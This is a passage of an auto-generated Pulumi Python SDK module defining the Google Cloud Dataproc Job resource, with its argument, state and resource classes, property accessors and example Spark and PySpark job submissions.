for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input['JobSchedulingArgs'] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input['JobSparkConfigArgs'] spark_config: The config of the Spark job.
:param pulumi.Input['JobSparksqlConfigArgs'] sparksql_config: The config of SparkSql job
"""
pulumi.set(__self__, "placement", placement)
if force_delete is not None:
pulumi.set(__self__, "force_delete", force_delete)
if hadoop_config is not None:
pulumi.set(__self__, "hadoop_config", hadoop_config)
if hive_config is not None:
pulumi.set(__self__, "hive_config", hive_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if pig_config is not None:
pulumi.set(__self__, "pig_config", pig_config)
if project is not None:
pulumi.set(__self__, "project", project)
if pyspark_config is not None:
pulumi.set(__self__, "pyspark_config", pyspark_config)
if reference is not None:
pulumi.set(__self__, "reference", reference)
if region is not None:
pulumi.set(__self__, "region", region)
if scheduling is not None:
pulumi.set(__self__, "scheduling", scheduling)
if spark_config is not None:
pulumi.set(__self__, "spark_config", spark_config)
if sparksql_config is not None:
pulumi.set(__self__, "sparksql_config", sparksql_config)
@property
@pulumi.getter
def placement(self) -> pulumi.Input['JobPlacementArgs']:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@placement.setter
def placement(self, value: pulumi.Input['JobPlacementArgs']):
pulumi.set(self, "placement", value)
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> Optional[pulumi.Input[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@force_delete.setter
def force_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_delete", value)
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> Optional[pulumi.Input['JobHadoopConfigArgs']]:
"""
The config of Hadoop job
"""
return pulumi.get(self, "hadoop_config")
@hadoop_config.setter
def hadoop_config(self, value: Optional[pulumi.Input['JobHadoopConfigArgs']]):
pulumi.set(self, "hadoop_config", value)
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> Optional[pulumi.Input['JobHiveConfigArgs']]:
"""
The config of hive job
"""
return pulumi.get(self, "hive_config")
@hive_config.setter
def hive_config(self, value: Optional[pulumi.Input['JobHiveConfigArgs']]):
pulumi.set(self, "hive_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The list of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> Optional[pulumi.Input['JobPigConfigArgs']]:
"""
The config of pag job.
"""
return pulumi.get(self, "pig_config")
@pig_config.setter
def pig_config(self, value: Optional[pulumi.Input['JobPigConfigArgs']]):
pulumi.set(self, "pig_config", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> Optional[pulumi.Input['JobPysparkConfigArgs']]:
"""
The config of pySpark job.
"""
return pulumi.get(self, "pyspark_config")
@pyspark_config.setter
def pyspark_config(self, value: Optional[pulumi.Input['JobPysparkConfigArgs']]):
pulumi.set(self, "pyspark_config", value)
@property
@pulumi.getter
def reference(self) -> Optional[pulumi.Input['JobReferenceArgs']]:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@reference.setter
def reference(self, value: Optional[pulumi.Input['JobReferenceArgs']]):
pulumi.set(self, "reference", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def scheduling(self) -> Optional[pulumi.Input['JobSchedulingArgs']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@scheduling.setter
def scheduling(self, value: Optional[pulumi.Input['JobSchedulingArgs']]):
pulumi.set(self, "scheduling", value)
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> Optional[pulumi.Input['JobSparkConfigArgs']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@spark_config.setter
def spark_config(self, value: Optional[pulumi.Input['JobSparkConfigArgs']]):
pulumi.set(self, "spark_config", value)
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> Optional[pulumi.Input['JobSparksqlConfigArgs']]:
"""
The config of the SparkSQL job.
"""
return pulumi.get(self, "sparksql_config")
@sparksql_config.setter
def sparksql_config(self, value: Optional[pulumi.Input['JobSparksqlConfigArgs']]):
pulumi.set(self, "sparksql_config", value)
@pulumi.input_type
class _JobState:
def __init__(__self__, *,
driver_controls_files_uri: Optional[pulumi.Input[str]] = None,
driver_output_resource_uri: Optional[pulumi.Input[str]] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input['JobHadoopConfigArgs']] = None,
hive_config: Optional[pulumi.Input['JobHiveConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input['JobPigConfigArgs']] = None,
placement: Optional[pulumi.Input['JobPlacementArgs']] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input['JobPysparkConfigArgs']] = None,
reference: Optional[pulumi.Input['JobReferenceArgs']] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input['JobSchedulingArgs']] = None,
spark_config: Optional[pulumi.Input['JobSparkConfigArgs']] = None,
sparksql_config: Optional[pulumi.Input['JobSparksqlConfigArgs']] = None,
statuses: Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]] = None):
"""
Input properties used for looking up and filtering Job resources.
:param pulumi.Input[str] driver_controls_files_uri: If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
:param pulumi.Input[str] driver_output_resource_uri: A URI pointing to the location of the stdout of the job's driver program.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input['JobHadoopConfigArgs'] hadoop_config: The config of the Hadoop job.
:param pulumi.Input['JobHiveConfigArgs'] hive_config: The config of the Hive job.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The map of labels (key/value pairs) to add to the job.
:param pulumi.Input['JobPigConfigArgs'] pig_config: The config of the Pig job.
:param pulumi.Input['JobPlacementArgs'] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input['JobPysparkConfigArgs'] pyspark_config: The config of the PySpark job.
:param pulumi.Input['JobReferenceArgs'] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input['JobSchedulingArgs'] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input['JobSparkConfigArgs'] spark_config: The config of the Spark job.
:param pulumi.Input['JobSparksqlConfigArgs'] sparksql_config: The config of the SparkSQL job.
:param pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]] statuses: The statuses of the job.
"""
if driver_controls_files_uri is not None:
pulumi.set(__self__, "driver_controls_files_uri", driver_controls_files_uri)
if driver_output_resource_uri is not None:
pulumi.set(__self__, "driver_output_resource_uri", driver_output_resource_uri)
if force_delete is not None:
pulumi.set(__self__, "force_delete", force_delete)
if hadoop_config is not None:
pulumi.set(__self__, "hadoop_config", hadoop_config)
if hive_config is not None:
pulumi.set(__self__, "hive_config", hive_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if pig_config is not None:
pulumi.set(__self__, "pig_config", pig_config)
if placement is not None:
pulumi.set(__self__, "placement", placement)
if project is not None:
pulumi.set(__self__, "project", project)
if pyspark_config is not None:
pulumi.set(__self__, "pyspark_config", pyspark_config)
if reference is not None:
pulumi.set(__self__, "reference", reference)
if region is not None:
pulumi.set(__self__, "region", region)
if scheduling is not None:
pulumi.set(__self__, "scheduling", scheduling)
if spark_config is not None:
pulumi.set(__self__, "spark_config", spark_config)
if sparksql_config is not None:
pulumi.set(__self__, "sparksql_config", sparksql_config)
if statuses is not None:
pulumi.set(__self__, "statuses", statuses)
@property
@pulumi.getter(name="driverControlsFilesUri")
def driver_controls_files_uri(self) -> Optional[pulumi.Input[str]]:
"""
If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
"""
return pulumi.get(self, "driver_controls_files_uri")
@driver_controls_files_uri.setter
def driver_controls_files_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_controls_files_uri", value)
@property
@pulumi.getter(name="driverOutputResourceUri")
def driver_output_resource_uri(self) -> Optional[pulumi.Input[str]]:
"""
A URI pointing to the location of the stdout of the job's driver program.
"""
return pulumi.get(self, "driver_output_resource_uri")
@driver_output_resource_uri.setter
def driver_output_resource_uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_output_resource_uri", value)
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> Optional[pulumi.Input[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@force_delete.setter
def force_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "force_delete", value)
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> Optional[pulumi.Input['JobHadoopConfigArgs']]:
"""
The config of the Hadoop job.
"""
return pulumi.get(self, "hadoop_config")
@hadoop_config.setter
def hadoop_config(self, value: Optional[pulumi.Input['JobHadoopConfigArgs']]):
pulumi.set(self, "hadoop_config", value)
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> Optional[pulumi.Input['JobHiveConfigArgs']]:
"""
The config of the Hive job.
"""
return pulumi.get(self, "hive_config")
@hive_config.setter
def hive_config(self, value: Optional[pulumi.Input['JobHiveConfigArgs']]):
pulumi.set(self, "hive_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
The map of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> Optional[pulumi.Input['JobPigConfigArgs']]:
"""
The config of the Pig job.
"""
return pulumi.get(self, "pig_config")
@pig_config.setter
def pig_config(self, value: Optional[pulumi.Input['JobPigConfigArgs']]):
pulumi.set(self, "pig_config", value)
@property
@pulumi.getter
def placement(self) -> Optional[pulumi.Input['JobPlacementArgs']]:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@placement.setter
def placement(self, value: Optional[pulumi.Input['JobPlacementArgs']]):
pulumi.set(self, "placement", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> Optional[pulumi.Input['JobPysparkConfigArgs']]:
"""
The config of the PySpark job.
"""
return pulumi.get(self, "pyspark_config")
@pyspark_config.setter
def pyspark_config(self, value: Optional[pulumi.Input['JobPysparkConfigArgs']]):
pulumi.set(self, "pyspark_config", value)
@property
@pulumi.getter
def reference(self) -> Optional[pulumi.Input['JobReferenceArgs']]:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@reference.setter
def reference(self, value: Optional[pulumi.Input['JobReferenceArgs']]):
pulumi.set(self, "reference", value)
@property
@pulumi.getter
def region(self) -> Optional[pulumi.Input[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@region.setter
def region(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "region", value)
@property
@pulumi.getter
def scheduling(self) -> Optional[pulumi.Input['JobSchedulingArgs']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@scheduling.setter
def scheduling(self, value: Optional[pulumi.Input['JobSchedulingArgs']]):
pulumi.set(self, "scheduling", value)
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> Optional[pulumi.Input['JobSparkConfigArgs']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@spark_config.setter
def spark_config(self, value: Optional[pulumi.Input['JobSparkConfigArgs']]):
pulumi.set(self, "spark_config", value)
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> Optional[pulumi.Input['JobSparksqlConfigArgs']]:
"""
The config of the SparkSQL job.
"""
return pulumi.get(self, "sparksql_config")
@sparksql_config.setter
def sparksql_config(self, value: Optional[pulumi.Input['JobSparksqlConfigArgs']]):
pulumi.set(self, "sparksql_config", value)
@property
@pulumi.getter
def statuses(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]]:
"""
The statuses of the job.
"""
return pulumi.get(self, "statuses")
@statuses.setter
def statuses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['JobStatusArgs']]]]):
pulumi.set(self, "statuses", value)
class Job(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
__props__=None):
"""
Manages a job resource within a Dataproc cluster within GCE. For more information see
[the official dataproc documentation](https://cloud.google.com/dataproc/).
!> **Note:** This resource does not support 'update', and changing any attributes will cause the resource to be recreated.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
mycluster = gcp.dataproc.Cluster("mycluster", region="us-central1")
# Submit an example spark job to a dataproc cluster
spark = gcp.dataproc.Job("spark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
spark_config=gcp.dataproc.JobSparkConfigArgs(
main_class="org.apache.spark.examples.SparkPi",
jar_file_uris=["file:///usr/lib/spark/examples/jars/spark-examples.jar"],
args=["1000"],
properties={
"spark.logConf": "true",
},
logging_config=gcp.dataproc.JobSparkConfigLoggingConfigArgs(
driver_log_levels={
"root": "INFO",
},
),
))
# Submit an example pyspark job to a dataproc cluster
pyspark = gcp.dataproc.Job("pyspark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
pyspark_config=gcp.dataproc.JobPysparkConfigArgs(
main_python_file_uri="gs://dataproc-examples-2f10d78d114f6aaec76462e3c310f31f/src/pyspark/hello-world/hello-world.py",
properties={
"spark.logConf": "true",
},
))
pulumi.export("sparkStatus", spark.statuses[0].state)
pulumi.export("pysparkStatus", pyspark.statuses[0].state)
```
## Import
This resource does not support import.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']] hadoop_config: The config of the Hadoop job.
:param pulumi.Input[pulumi.InputType['JobHiveConfigArgs']] hive_config: The config of the Hive job.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The map of labels (key/value pairs) to add to the job.
:param pulumi.Input[pulumi.InputType['JobPigConfigArgs']] pig_config: The config of the Pig job.
:param pulumi.Input[pulumi.InputType['JobPlacementArgs']] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']] pyspark_config: The config of the PySpark job.
:param pulumi.Input[pulumi.InputType['JobReferenceArgs']] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input[pulumi.InputType['JobSchedulingArgs']] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input[pulumi.InputType['JobSparkConfigArgs']] spark_config: The config of the Spark job.
:param pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']] sparksql_config: The config of the SparkSQL job.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: JobArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a job resource within a Dataproc cluster within GCE. For more information see
[the official dataproc documentation](https://cloud.google.com/dataproc/).
!> **Note:** This resource does not support 'update', and changing any attributes will cause the resource to be recreated.
## Example Usage
```python
import pulumi
import pulumi_gcp as gcp
mycluster = gcp.dataproc.Cluster("mycluster", region="us-central1")
# Submit an example spark job to a dataproc cluster
spark = gcp.dataproc.Job("spark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
spark_config=gcp.dataproc.JobSparkConfigArgs(
main_class="org.apache.spark.examples.SparkPi",
jar_file_uris=["file:///usr/lib/spark/examples/jars/spark-examples.jar"],
args=["1000"],
properties={
"spark.logConf": "true",
},
logging_config=gcp.dataproc.JobSparkConfigLoggingConfigArgs(
driver_log_levels={
"root": "INFO",
},
),
))
# Submit an example pyspark job to a dataproc cluster
pyspark = gcp.dataproc.Job("pyspark",
region=mycluster.region,
force_delete=True,
placement=gcp.dataproc.JobPlacementArgs(
cluster_name=mycluster.name,
),
pyspark_config=gcp.dataproc.JobPysparkConfigArgs(
main_python_file_uri="gs://dataproc-examples-2f10d78d114f6aaec76462e3c310f31f/src/pyspark/hello-world/hello-world.py",
properties={
"spark.logConf": "true",
},
))
pulumi.export("sparkStatus", spark.statuses[0].state)
pulumi.export("pysparkStatus", pyspark.statuses[0].state)
```
## Import
This resource does not support import.
:param str resource_name: The name of the resource.
:param JobArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(JobArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = JobArgs.__new__(JobArgs)
__props__.__dict__["force_delete"] = force_delete
__props__.__dict__["hadoop_config"] = hadoop_config
__props__.__dict__["hive_config"] = hive_config
__props__.__dict__["labels"] = labels
__props__.__dict__["pig_config"] = pig_config
if placement is None and not opts.urn:
raise TypeError("Missing required property 'placement'")
__props__.__dict__["placement"] = placement
__props__.__dict__["project"] = project
__props__.__dict__["pyspark_config"] = pyspark_config
__props__.__dict__["reference"] = reference
__props__.__dict__["region"] = region
__props__.__dict__["scheduling"] = scheduling
__props__.__dict__["spark_config"] = spark_config
__props__.__dict__["sparksql_config"] = sparksql_config
__props__.__dict__["driver_controls_files_uri"] = None
__props__.__dict__["driver_output_resource_uri"] = None
__props__.__dict__["statuses"] = None
super(Job, __self__).__init__(
'gcp:dataproc/job:Job',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
driver_controls_files_uri: Optional[pulumi.Input[str]] = None,
driver_output_resource_uri: Optional[pulumi.Input[str]] = None,
force_delete: Optional[pulumi.Input[bool]] = None,
hadoop_config: Optional[pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']]] = None,
hive_config: Optional[pulumi.Input[pulumi.InputType['JobHiveConfigArgs']]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
pig_config: Optional[pulumi.Input[pulumi.InputType['JobPigConfigArgs']]] = None,
placement: Optional[pulumi.Input[pulumi.InputType['JobPlacementArgs']]] = None,
project: Optional[pulumi.Input[str]] = None,
pyspark_config: Optional[pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']]] = None,
reference: Optional[pulumi.Input[pulumi.InputType['JobReferenceArgs']]] = None,
region: Optional[pulumi.Input[str]] = None,
scheduling: Optional[pulumi.Input[pulumi.InputType['JobSchedulingArgs']]] = None,
spark_config: Optional[pulumi.Input[pulumi.InputType['JobSparkConfigArgs']]] = None,
sparksql_config: Optional[pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']]] = None,
statuses: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['JobStatusArgs']]]]] = None) -> 'Job':
"""
Get an existing Job resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
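## Example Usage
A hypothetical lookup of a previously created job; the resource name, project, region, and job ID below are placeholders, not values taken from this module:
```python
import pulumi_gcp as gcp

# Recover the state of an existing Dataproc job from its provider ID.
existing = gcp.dataproc.Job.get("existing-spark-job",
    id="projects/my-project/regions/us-central1/jobs/job-1234")
```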
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] driver_controls_files_uri: If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
:param pulumi.Input[str] driver_output_resource_uri: A URI pointing to the location of the stdout of the job's driver program.
:param pulumi.Input[bool] force_delete: By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
:param pulumi.Input[pulumi.InputType['JobHadoopConfigArgs']] hadoop_config: The config of the Hadoop job.
:param pulumi.Input[pulumi.InputType['JobHiveConfigArgs']] hive_config: The config of the Hive job.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: The map of labels (key/value pairs) to add to the job.
:param pulumi.Input[pulumi.InputType['JobPigConfigArgs']] pig_config: The config of the Pig job.
:param pulumi.Input[pulumi.InputType['JobPlacementArgs']] placement: The config of job placement.
:param pulumi.Input[str] project: The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
:param pulumi.Input[pulumi.InputType['JobPysparkConfigArgs']] pyspark_config: The config of the PySpark job.
:param pulumi.Input[pulumi.InputType['JobReferenceArgs']] reference: The reference of the job
:param pulumi.Input[str] region: The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
:param pulumi.Input[pulumi.InputType['JobSchedulingArgs']] scheduling: Optional. Job scheduling configuration.
:param pulumi.Input[pulumi.InputType['JobSparkConfigArgs']] spark_config: The config of the Spark job.
:param pulumi.Input[pulumi.InputType['JobSparksqlConfigArgs']] sparksql_config: The config of the SparkSQL job.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['JobStatusArgs']]]] statuses: The statuses of the job.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _JobState.__new__(_JobState)
__props__.__dict__["driver_controls_files_uri"] = driver_controls_files_uri
__props__.__dict__["driver_output_resource_uri"] = driver_output_resource_uri
__props__.__dict__["force_delete"] = force_delete
__props__.__dict__["hadoop_config"] = hadoop_config
__props__.__dict__["hive_config"] = hive_config
__props__.__dict__["labels"] = labels
__props__.__dict__["pig_config"] = pig_config
__props__.__dict__["placement"] = placement
__props__.__dict__["project"] = project
__props__.__dict__["pyspark_config"] = pyspark_config
__props__.__dict__["reference"] = reference
__props__.__dict__["region"] = region
__props__.__dict__["scheduling"] = scheduling
__props__.__dict__["spark_config"] = spark_config
__props__.__dict__["sparksql_config"] = sparksql_config
__props__.__dict__["statuses"] = statuses
return Job(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="driverControlsFilesUri")
def driver_controls_files_uri(self) -> pulumi.Output[str]:
"""
If present, the location of miscellaneous control files which may be used as part of job setup and handling. If not present, control files may be placed in the same location as driver_output_uri.
"""
return pulumi.get(self, "driver_controls_files_uri")
@property
@pulumi.getter(name="driverOutputResourceUri")
def driver_output_resource_uri(self) -> pulumi.Output[str]:
"""
A URI pointing to the location of the stdout of the job's driver program.
"""
return pulumi.get(self, "driver_output_resource_uri")
@property
@pulumi.getter(name="forceDelete")
def force_delete(self) -> pulumi.Output[Optional[bool]]:
"""
By default, you can only delete inactive jobs within
Dataproc. Setting this to true, and calling destroy, will ensure that the
job is first cancelled before issuing the delete.
"""
return pulumi.get(self, "force_delete")
@property
@pulumi.getter(name="hadoopConfig")
def hadoop_config(self) -> pulumi.Output[Optional['outputs.JobHadoopConfig']]:
"""
The config of the Hadoop job.
"""
return pulumi.get(self, "hadoop_config")
@property
@pulumi.getter(name="hiveConfig")
def hive_config(self) -> pulumi.Output[Optional['outputs.JobHiveConfig']]:
"""
The config of the Hive job.
"""
return pulumi.get(self, "hive_config")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
The map of labels (key/value pairs) to add to the job.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="pigConfig")
def pig_config(self) -> pulumi.Output[Optional['outputs.JobPigConfig']]:
"""
The config of the Pig job.
"""
return pulumi.get(self, "pig_config")
@property
@pulumi.getter
def placement(self) -> pulumi.Output['outputs.JobPlacement']:
"""
The config of job placement.
"""
return pulumi.get(self, "placement")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The project in which the `cluster` can be found and jobs
subsequently run against. If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter(name="pysparkConfig")
def pyspark_config(self) -> pulumi.Output[Optional['outputs.JobPysparkConfig']]:
"""
The config of the PySpark job.
"""
return pulumi.get(self, "pyspark_config")
@property
@pulumi.getter
def reference(self) -> pulumi.Output['outputs.JobReference']:
"""
The reference of the job
"""
return pulumi.get(self, "reference")
@property
@pulumi.getter
def region(self) -> pulumi.Output[Optional[str]]:
"""
The Cloud Dataproc region. This essentially determines which clusters are available
for this job to be submitted to. If not specified, defaults to `global`.
"""
return pulumi.get(self, "region")
@property
@pulumi.getter
def scheduling(self) -> pulumi.Output[Optional['outputs.JobScheduling']]:
"""
Optional. Job scheduling configuration.
"""
return pulumi.get(self, "scheduling")
@property
@pulumi.getter(name="sparkConfig")
def spark_config(self) -> pulumi.Output[Optional['outputs.JobSparkConfig']]:
"""
The config of the Spark job.
"""
return pulumi.get(self, "spark_config")
@property
@pulumi.getter(name="sparksqlConfig")
def sparksql_config(self) -> pulumi.Output[Optional['outputs.JobSparksqlConfig']]:
"""
The config of the SparkSQL job.
"""
return pulumi.get(self, "sparksql_config")
@property
@pulumi.getter
def statuses(self) -> pulumi.Output[Sequence['outputs.JobStatus']]:
"""
The statuses of the job.
"""
return pulumi.get(self, "statuses")
